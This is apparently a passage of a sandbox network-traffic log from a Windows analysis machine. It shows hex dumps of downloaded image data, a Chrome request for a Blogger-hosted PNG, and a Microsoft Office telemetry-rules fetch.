                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 7d 13 6e cd 34 d3 d3 6b 5a c7 2e 23 8b 30 35 15 68 fb d6 93 6d 2b 5b 56 92 bd d3 bf ae e7 89 c2 fe 65 ba b0 dc 37 28 24 30 da 73 df 8a b4 3a 54 2a 9e 5a 6d 5f ba bc 0a 90 38 c7 5a fd aa 3b 1f 97 3d c7 51 40 6c d1 54 20 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 01 91 ff 00 c7 ca fd 45 7e aa fe c5 5f f2 8c 0f 08 ff 00 d8 9d 3f fe 81 2d 7e 55 47 ff 00 1f 2b f5 15 fa ab fb 14 f1 ff 00 04 bf f0 8f fd 89 b3 ff 00 e8 12 d7 e4 de 2e 7f c8 ba 87 f8 ff 00 f6 d6 7e 8f e1 9f fb f5 5f f0 7f ed c8 e0 ff 00 e0 b6 7f f2 43 3c 1b ff 00 63 40 ff 00 d2 59 eb f3 9d 3a 57 e8 c7 fc 16 cf fe 48 67 83 7f ec 68 1f fa 4b 3d 7e 73 a7 4a f5 fc 31 ff 00 91 14 7f c5 3f cd 1e 5f 1f ff 00 c8 e2 5f e1 8f e4 47 a8 ca 61 b0 99 86 dc aa 12
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: }n4kZ.#05hm+[Ve7($0s:T*Zm_8Z;=Q@lT ((((((((E~_?-~UG+.~_C<c@Y:WHghK=~sJ1?__Ga
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 3d 13 e0 8f ec fb e0 8f 13 78 6b 5e bb b7 d5 34 bf 19 ac c7 4f 8e d4 ca d7 36 d3 69 52 49 7f f6 79 62 96 3d dc ab 28 c8 35 c8 fc 51 fd 9d 6c 7e 1c c7 79 26 a1 e2 6d 27 45 d7 6e 60 93 59 d2 74 69 44 ce 2e 2d d2 f4 c3 15 ba dc e4 3f 99 22 a6 42 31 e4 03 51 e9 1f b5 ae b9 e1 b8 56 0d 27 43 f0 b6 8f 66 7e ce cd 6f 6f 64 76 ef 82 e4 dc 2b 13 9c b6 58 9c e4 f4 aa ba b7 ed 37 ad 78 87 48 5b 5b ed 37 c3 f7 37 7e 4b d8 c5 ab 4b 65 e6 5e 58 5a b5 df da 4c 71 92 70 40 62 71 9e 42 82 b9 f9 b2 38 e8 e5 f9 ec 31 2e a7 37 ba df 78 dd 68 bc ad eb 6d 7b 6a 74 4b 17 95 4a 92 8f 2e ab c9 f7 7d 56 b7 fc 0d 6f db 4b e0 1d 8f ec ef f1 37 53 b5 82 6b 5d 3e 1d 53 55 bd 7d 23 40 82 26 f2 ec 34 98 a4 58 e2 62 e7 23 e6 93 cd 21 49 23 0d d3 8a ef fe 1e 7e c4 36 be 1f f8 b3 e1 bb 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =xk^4O6iRIyb=(5Ql~y&m'En`YtiD.-?"B1QV'Cf~oodv+X7xH[[77~KKe^XZLqp@bqB81.7xhm{jtKJ.}VoK7Sk]>SU}#@&4Xb#!I#~6=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: f0 af 1f f1 fd e3 8f fc 19 c3 ff 00 c6 2b e6 75 f1 46 a9 ff 00 41 6d 63 e9 f6 e9 f8 ff 00 c7 e9 7f e1 27 d5 7f e8 2d ac 7f e0 74 ff 00 fc 5d 3f f5 cf 3c ff 00 a0 ba 9f f8 13 0f f5 6f 2a ff 00 a0 78 7d c8 fa 5f fe 1c dd f0 af 1f f1 fd e3 8f fc 19 c3 ff 00 c6 28 ff 00 87 37 7c 2b ff 00 9f ef 1c 7f e0 ce 1f fe 31 5f 34 7f c2 4f aa ff 00 d0 5b 58 ff 00 c0 e9 ff 00 f8 ba ab aa f8 b7 59 8a c6 7f 2b 5a d6 a3 7f 29 d9 5c 5f cd f2 90 a4 8c 82 dd 0d 2f f5 cf 3c ff 00 a0 ba 9f f8 13 0f f5 6f 2a ff 00 a0 78 7d c8 fa 84 7f c1 1c 3e 15 37 4b ef 1c 1c 75 c6 a9 0f 1f f9 02 8f f8 73 6f c2 bc 7f c7 f7 8e 3f f0 67 0f ff 00 18 af 22 fd a6 3c 45 a8 d9 7c 46 b2 8e d7 52 d4 6d e3 ff 00 84 7b 4a 7f 2a 1b b9 22 57 76 b6 5c bb 61 ba e0 7d 6b 82 97 c4 fa af 97 ff 00 21 6d 63 e8 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: +uFAmc'-t]?<o*x}_(7|+1_4O[XY+Z)\_/<o*x}>7Kuso?g"<E|FRm{J*"Wv\a}k!mco
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: ca ab e2 9d 50 8c 9d 57 58 cf fd 7f 4d ff 00 c5 d4 69 e2 6d 50 15 ff 00 89 be ad ff 00 81 f2 ff 00 f1 54 7f ae 79 e7 fd 05 d4 ff 00 c0 98 3e 19 ca 97 fc c3 c3 ff 00 01 47 d5 df f0 e6 ef 85 78 ff 00 8f ef 1c 7f e0 ce 1f fe 31 47 fc 39 bb e1 5f fc ff 00 78 e3 ff 00 06 70 ff 00 f1 8a f9 4e 4f 13 ea 84 0f f8 9b 6a ff 00 f8 1d 30 ff 00 d9 e8 8f c4 fa a0 1f f2 16 d5 ff 00 f0 3a 6f fe 2e 8f f5 cf 3c ff 00 a0 ba 9f f8 13 27 fd 5a ca bf e8 1e 1f f8 0a 3e ac 1f f0 46 ef 85 6a 7f e3 fb c7 43 1e 9a 9c 3f fc 62 bd 8f 47 f8 4d a6 fc 10 fd 98 ee 3c 27 a2 b5 e1 d1 fc 3f a0 5c da 5a 8b a9 3c c9 42 08 a5 3f 31 01 72 79 1c e3 b5 7e 79 0f 14 ea 80 2f fc 4d b5 7e a3 1f e9 b3 7f f1 75 f7 8f c0 9b 99 2f ff 00 60 5d 26 69 a7 9a e6 66 f0 b4 ec f2 c8 e5 9e 4f dd 49 cb 13 c9 af 3f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PWXMimPTy>Gx1G9_xpNOj0:o.<'Z>FjC?bGM<'?\Z<B?1ry~y/M~u/`]&ifOI?
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 1e 79 e9 eb 48 ad 95 14 c9 13 6a 55 8c 50 04 2c 72 78 35 df 78 0c ff 00 c6 33 7c 4e ff 00 b0 a6 83 ff 00 a3 cd 70 77 03 00 7d 6b bc f0 1f fc 9b 37 c4 ef fb 0a 68 5f fa 3c d0 12 d8 e0 43 66 46 a5 38 22 96 21 c9 fa 0a 93 14 01 0e 07 af eb 4a 14 1f 5f ce a5 c5 46 78 90 fd 05 00 08 80 c7 9e 7a 7a d3 54 02 07 3f ad 49 17 fa a5 fa 52 4c 30 9f 88 fe 74 00 dd bf 5f ce 8d bf 5f ce 96 8a 00 8e 1f f5 ab f5 af bf 3f 67 81 bb fe 09 f5 a3 ff 00 b3 e1 39 f1 ff 00 7e a4 af 80 e1 ff 00 58 bf ef 7f 85 7d f9 fb 3b ff 00 ca 3e 74 9f fb 14 e6 ff 00 d1 72 53 88 a4 65 7f c1 47 50 bf c3 4f 0f e3 b6 b6 3f f4 44 95 f2 3a c4 db be ef 61 de be bc ff 00 82 8b 0d df 0d 74 1f fb 0d 0f fd 11 25 7c 92 db 91 f1 ed 51 29 24 c8 20 e8 48 db f7 68 8d c4 bf 74 66 a6 36 8c ce c7 70 eb 8e 94 d8
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: yHjUP,rx5x3|Npw}k7h_<CfF8"!J_FxzzT?IRL0t__?g9~X};>trSeGPO?D:at%|Q)$ Hhtf6p


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          16192.168.2.749725142.250.185.1614432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC909OUTGET /img/b/R29vZ2xl/AVvXsEhTZef2smB-4WzKsOkrjN080E4YRXcWmVbIq6jcTxUMgr56k-eUFqy-Jm7D6EXXqB1WQfk-XifK51XMT1BsWcREtTRxd8-6dGx6m_nWYjXwYtdWuSM5xKwP0FgJhf4pxe8oEKqIizH5_bYtcQc3HUz44jaH9QX0JyjQKcO_NqOZwd1QZx9dzpk_d77Uaw/s300/Best%20Auto%20Insurance.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: blogger.googleusercontent.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                                                                                                          ETag: "v2a8"
                                                                                                                                                                                                                                                                                                                                                                          Expires: Tue, 15 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="Best Auto Insurance.png"
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 14864
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC911INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 fa 08 02 00 00 00 94 0f ed a4 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 7c 14 d5 f9 ff 9f e7 cc ec e6 b2 09 49 b8 24 10 ee 17 e5 26 05 51 7f d0 56 84 2f 54 01 45 d1 2f 08 b5 68 4b 15 ad 28 a2 b5 a0 6d 55 a8 ad 50 45 fc 5a a3 82 08 b5 2a 16 2a 15 10 a2 04 94 20 08 88 48 40 c3 55 30 24 24 11 72 21 64 93 90 cd 5e e7 3c bf 3f ce ee 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR,sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx{|I$&QV/TE/hK(mUPEZ** H@U0$$r!d^<?d
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 6e b7 fb 7c be 66 a8 a2 a9 84 97 25 04 80 ff fc e7 3f 44 54 52 52 d2 90 cc 23 46 8c 68 4d 57 7b df be 7d db dc f8 84 70 71 e5 e5 e5 99 58 07 8b c5 12 1f 1f ff 43 f2 5b ad 56 b7 db 3d 7c f8 f0 a0 9c f1 f1 f1 c2 b3 d0 a6 09 bb 71 42 b7 db dd f0 cc c5 c5 c5 62 a3 b0 b0 f0 c2 85 0b 56 ab 55 d3 34 9b cd d6 bd 7b f7 d0 cc 17 2e 5c 28 2b 2b 73 b9 5c 8c b1 6e dd ba c5 c6 c6 ea 1f 71 ce cb cb cb 63 63 63 2b 2b 2b ab aa aa ec 76 7b 42 42 42 55 55 55 d7 ae 5d a3 a2 a2 f4 6c fa 4f 17 22 8a 94 ec ec ec 75 eb d6 cd 9f 3f bf 9e 47 c1 e1 70 68 9a d6 ae 5d 3b bd 10 a7 d3 69 b1 58 42 f5 7c ee dc 39 b1 e1 f1 78 ac 56 6b 52 52 92 b1 d8 f2 f2 72 87 c3 d1 b1 63 47 63 a3 ce e9 74 da ed f6 a0 44 9d aa aa aa f3 e7 cf 03 80 f1 a7 ea e2 c5 8b c6 6b 2f 2d 2d 75 38 1c e2 44 55 55 55
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: n|f%?DTRR#FhMW{}pqXC[V=|qBbVU4{.\(++s\nqccc+++v{BBBUUU]lO"u?Gph];iXB|9xVkRRrcGctDk/--u8DUUU
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: e8 bb 9b 36 6d 1a 3c 78 f0 ce 9d 3b 1f 7c f0 c1 55 ab 56 5d d2 db e1 f1 78 12 12 12 a6 4c 99 62 4c 3c 72 e4 08 63 4c 3c 9d 44 b4 78 f1 e2 c8 c8 c8 f4 f4 f4 d0 c3 d7 af 5f 0f 00 4b 97 2e 15 bb 37 de 78 63 7c 7c 7c 50 9e 47 1e 79 24 36 36 b6 1e b7 c7 da b5 6b ad 56 6b 90 13 ff ec d9 b3 5d bb 76 1d 3f 7e 7c ad 87 5c 73 cd 35 16 8b 45 6c ef d9 b3 47 55 d5 f7 df 7f bf be eb 24 22 a2 07 1f 7c 30 2a 2a 2a 3b 3b 5b ec 7e fa e9 a7 23 46 8c 10 db 59 59 59 51 51 51 ab 56 ad d2 33 df 72 cb 2d 56 ab 75 e0 c0 81 bd 02 0c 1a 34 48 f7 bb 84 e6 ff fb df ff ae 28 ca f1 e3 c7 83 4e 3a 67 ce 1c e3 03 f0 f0 c3 0f df 7d f7 dd 41 79 5e 7f fd f5 51 a3 46 e9 5f d6 4f 7f fa 53 45 51 0e 1f 3e 2c 76 dd 6e f7 e9 d3 a7 93 93 93 ef ba eb 2e b3 7c 3c 61 d7 1c ad ac ac e4 9c 9f 3b 77 ae
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 6m<x;|UV]xLbL<rcL<Dx_K.7xc|||PGy$66kVk]v?~|\s5ElGU$"|0***;;[~#FYYYQQQV3r-Vu4H(N:g}Ay^QF_OSEQ>,vn.|<a;w
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 7b 2d 00 14 16 16 6e d9 b2 65 c8 90 21 46 73 e4 74 3a d7 ac 59 73 cd 35 d7 0c 1b 36 4c 2f 39 32 32 72 c6 8c 19 fa e9 f6 ef df bf 63 c7 8e a3 47 8f de 7c f3 cd c2 47 62 a4 aa aa 6a d3 a6 4d 59 59 59 36 9b 2d 2a 2a 6a f2 e4 c9 c9 c9 c9 a7 4e 9d ea df bf ff 82 05 0b 9e 7d f6 59 91 8d 88 3e fd f4 d3 03 07 0e 18 83 d1 19 63 b7 de 7a ab b1 34 b7 db bd 6f df be 6f bf fd b6 4b 97 2e 4e a7 53 51 94 eb af bf de 6a b5 66 64 64 0c 18 30 a0 67 cf 9e b5 de a2 8d 1b 37 66 67 67 4f 9f 3e bd 5b b7 6e 41 1f 1d 3e 7c 78 df be 7d 56 ab 55 b7 d5 4e a7 f3 86 1b 6e 30 36 2b f6 ef df 9f 9d 9d 7d c3 0d 37 74 ed da b5 be 6f 22 40 6e 6e ee e6 cd 9b a7 4f 9f 6e 74 e1 ee db b7 ef cc 99 33 b7 df 7e bb ae ab c3 87 0f 7f f2 c9 27 62 a4 c1 e9 74 76 ea d4 69 dc b8 71 f5 e4 2f 2d 2d 5d bb
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {-ne!Fst:Ys56L/922rcG|GbjMYYY6-**jN}Y>cz4ooK.NSQjfdd0g7fggO>[nA>|x}VUNn06+}7to"@nnOnt3~'btviq/--]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 98 31 a3 6b d7 ae 75 9d 62 fb f6 ed 09 09 09 f9 f9 f9 a1 1f ad 59 b3 46 ff 6d 7d ef bd f7 00 40 2f 79 d9 b2 65 11 11 11 b5 be b9 41 bc b2 e2 c5 17 5f 24 22 b1 1c e0 fc f9 f3 39 e7 e2 d3 ca ca ca 17 5e 78 21 2a 2a 6a cb 96 2d 97 ba 7a 49 a3 91 cd d1 e6 87 88 22 22 22 c8 10 0f 58 5a 5a 6a 5c 83 23 31 31 d1 38 f5 fb e4 c9 93 57 5c 71 45 d0 5a 4f 67 ce 9c 39 7b f6 6c 7e 7e 7e 5d e1 a6 76 bb 3d 2b 2b 2b 68 be 7c 45 45 c5 ac 59 b3 ee b8 e3 0e b1 2b 96 ea d1 fb 7b ff f8 c7 3f 3a 77 ee 3c 79 f2 e4 d0 d2 84 f3 46 ac 0a 91 94 94 74 f3 cd 37 bf fd f6 db d9 d9 d9 13 27 4e 3c 7f fe fc f6 ed db 5d 2e d7 96 2d 5b c6 8c 19 d3 f0 fb 20 69 20 d2 3b da fc 08 9f 87 71 b1 b0 ce 9d 3b 1b e3 83 0f 1d 3a 64 b7 db f5 dd d4 d4 54 63 00 da d9 b3 67 7f ff fb df 9f 3d 7b 16 02 ee cd
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1kubYFm}@/yeA_$"9^x!**j-zI"""XZZj\#118W\qEZOg9{l~~~]v=+++h|EEY+{?:w<yFt7'N<].-[ i ;q;:dTcg={
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 44 04 a4 00 00 67 1a 11 89 74 0e 8c 88 18 55 eb 47 03 42 44 f0 79 19 63 84 c0 18 b3 44 45 76 ec 9e dc ef ff 0d 83 d1 d7 60 cf 78 b0 01 59 02 86 32 f8 bc d2 06 4a 1a 47 d8 2d f4 e4 17 15 fa b7 15 60 c4 79 79 e1 f9 ad af fe ab f0 ab a3 91 25 9e 78 0f 8b b6 a8 56 54 88 10 02 1a d0 95 60 e8 9b e9 09 c4 48 5c a6 5f 84 44 54 ab 08 75 38 02 11 59 10 38 e7 c0 90 73 ee 03 72 33 aa 40 af bb 6b 5c af 71 d7 dd 30 e3 8e f8 5e 5d 00 00 01 44 3b 59 1a 40 49 93 09 47 11 0a fb 86 88 e0 01 28 76 6a 6b 76 ec fc ef 66 57 d9 45 ab d5 6a b1 a0 a2 28 1a 6a 8c 31 dd 0c 32 c6 34 d0 00 80 11 03 00 8e 0c 00 90 6b 00 a0 01 12 11 72 22 22 24 46 44 c4 45 7b b2 a6 db 93 08 38 22 a2 68 ca 0a 79 2b 1c 00 80 18 02 00 72 e2 9c 13 43 4d d3 bc 2e 77 5c 5c dc 75 53 6f 8a bd 6b 22 f4 8f 01 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: DgtUGBDycDEv`xY2JG-`yy%xVT`H\_DTu8Y8sr3@k\q0^]D;Y@IG(vjkvfWEj(j124kr""$FDE{8"hy+rCM.w\\uSok"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: ea 30 70 e0 2f ef bd 37 26 26 c6 e3 f1 88 d2 82 44 55 ab 1b 30 48 6f c6 dd a0 27 c9 68 63 bd 5e 2f 34 b8 87 f9 63 43 de 96 7a 08 23 11 1a 65 06 00 8c 31 45 65 8c a9 8a 62 51 55 2b 30 06 8c 31 e6 ff df 20 4b 0e c0 b9 82 88 a8 02 2a e4 f3 b4 8b 80 48 c5 ef 47 b1 a9 da e8 21 bd df fc 93 7d c2 4f ca bc 0e 50 35 60 a8 20 22 70 86 84 c4 91 98 86 04 0a d3 5b 9e a1 83 f8 a1 01 3d 41 54 07 df 48 24 8d 27 8c 44 a8 a3 ff 6a ea 0e 4c fd d1 0f 75 66 1a cd 63 f5 46 cd 81 66 6b 7c fc 84 7b ef bd f6 da 6b 9d 4e a7 b1 9d 29 ca 07 a3 6f 36 a4 0e 50 c7 af 78 68 35 ea 51 a9 44 52 0f e1 22 c2 a0 67 17 91 10 01 91 84 a1 43 24 a6 00 53 6a b8 55 18 f8 c3 d7 18 63 48 c0 11 48 61 1a 02 d3 48 8f 89 45 00 06 48 2a 42 27 5b fc e2 07 3c bf 1e 5b 0e 1e 2f 23 2f 72 4e 48 08 1c 48 65 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0p/7&&DU0Ho'hc^/4cCz#e1EebQU+01 K*HG!}OP5` "p[=ATH$'DjLufcFfk|{kN)o6Pxh5QDR"gC$SjUcHHaHEH*B'[<[/#/rNHHe
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: a6 dd 1c e3 81 c6 c2 8d db c6 3c c6 e7 cc 58 81 a0 5d 63 9d 9b 05 fd 97 c8 36 ae 67 f7 b5 93 6d e3 7a 76 9c 3f a2 e3 3c 7f 2b b4 b1 9a 6f ec 55 37 ed 10 53 08 53 11 0a c8 80 b0 78 ba b9 d3 02 f8 7c 3e ad 26 7a 4c 4c 68 69 28 86 37 c0 3f 68 e1 ef 76 72 9e dc bd fb af 9f 7e fa da 6b af 75 b9 5c 41 eb 88 1a 87 22 8d 26 b1 d6 8e 62 f8 a3 1b a2 5a 77 9b 17 5d d5 31 63 7b e9 89 a2 51 20 31 12 a6 7d 42 ce 7d 40 56 ae 11 47 e2 62 b6 84 46 44 c4 b8 c6 11 09 19 22 02 23 00 a0 80 99 22 22 d0 08 bc 0c 34 2e de 1f 01 41 93 37 84 ed aa e1 6e 41 22 02 31 de f8 93 b8 01 ab e7 97 be bc e6 ab d5 a9 03 2f 46 32 c6 34 51 13 04 aa db 17 4a 8d 0f 91 69 72 17 ab 85 68 b9 fa 28 09 91 42 87 46 6b a3 77 c6 9a 51 8d 66 8d 58 36 17 61 2b 42 4e 44 c4 85 01 04 d0 63 51 c4 7b 26 90 10
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <X]c6gmzv?<+oU7SSx|>&zLLhi(7?hvr~ku\A"&bZw]1c{Q 1}B}@VGbFD"#""4.A7nA"1/F24QJirh(BFkwQfX6a+BNDcQ{&
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 56 2b 43 45 3f 9d 7e 78 ad 0e 18 0a 44 a0 42 6d f3 36 ea c2 38 56 7e b9 46 8d 38 d2 73 f5 86 68 c7 f9 23 84 27 26 79 d9 78 c7 0e 7f 7a c9 d2 fd ed a6 f6 3f f7 d0 36 7d 37 61 d6 d0 1f ad c3 26 4c 45 a8 3f df a4 2f 4e e1 1f c4 47 22 62 fe 88 35 f1 66 5c 91 ee 3f 8c 73 62 81 e0 6c 51 94 2e 45 e6 1f ef e3 04 80 80 cc 6f e6 00 f2 5c c7 e6 bd 0c fb 8f 5c 11 13 ef 45 4e 58 43 f9 0c 30 30 93 bf b6 b0 18 6c f4 ba f7 67 26 be af 6f b7 4e d0 63 d3 16 b0 f9 21 18 8d aa 6e 00 95 84 c8 e4 65 e3 f3 ef da 04 00 9a dd 95 3d f2 5d 5d a8 2d 34 40 d2 56 08 bf e6 68 6d cb 9c e9 01 34 7a f0 8a 71 86 a1 71 26 61 d0 40 42 cd 82 fd b3 28 fc fb 88 00 e0 ac ac fc f0 c5 17 4f 9c 38 11 13 13 63 8c 8c 09 ea f2 19 83 63 82 11 13 33 00 1a 6e 0c c3 93 16 92 81 b1 58 63 a3 54 57 a0 3e d3
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: V+CE?~xDBm68V~F8sh#'&yxz?6}7a&LE?/NG"b5f\?sblQ.Eo\\ENXC00lg&oNc!ne=]]-4@Vhm4zqq&a@B(O8cc3nXcTW>
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC1390INData Raw: 00 ff 5b 11 c5 87 22 9e 86 13 00 80 37 42 01 84 a6 3d 9d fa fd 10 55 68 d4 31 c6 96 79 3d 19 2e 79 ec 25 cb 31 1e 15 da 98 af 95 50 f1 84 2a 4a 7f 06 42 53 ea 2a e4 92 e7 6d 5b 98 2c 42 fd 3e 56 cf 55 8f 8d b5 58 2c e4 0e be c5 b5 7e e5 46 9d 88 74 8b c5 92 9b 9b 0b e7 0a 20 a1 33 63 ec c2 99 9c d5 7f 7e 2e f9 c8 c5 58 9b cd 9f 07 6b b8 3a 83 ec 6a 50 ba be 6d 74 87 06 3a a5 fe bc 9c 48 45 a6 a8 6a 42 fb f6 10 f2 5b de c8 07 25 dc 9f aa d0 9f aa fa 2f 30 48 d8 b5 aa fd 92 65 d6 7a 8a cb 46 81 60 ba 08 05 35 1c 2d dd db 3b 93 db c5 1f b7 2b aa ca 45 ab 92 71 4e 5c 01 66 7c a6 83 7e 1d 39 53 34 4d 53 81 18 63 5d 72 9d 19 73 5f 1e 3a 61 8c c3 e1 38 9a fa 59 df 0b 55 91 91 b6 80 ef 84 7c c4 d1 f0 96 ec ba da b7 02 63 4b 58 b8 41 19 43 ce 03 93 15 d1 ef 79 f5
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ["7B=Uh1y=.y%1P*JBS*m[,B>VUX,~Ft 3c~.Xk:jPmt:HEjB[%/0HezF`5-;+EqN\f|~9S4MSc]rs_:a8YU|cKXACy


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          17192.168.2.74973113.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 408
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 8bb3084a-701e-0053-175b-1c3a0a000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091233Z-17db6f7c8cf9c22xp43k2gbqvn00000003sg0000000089ee
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
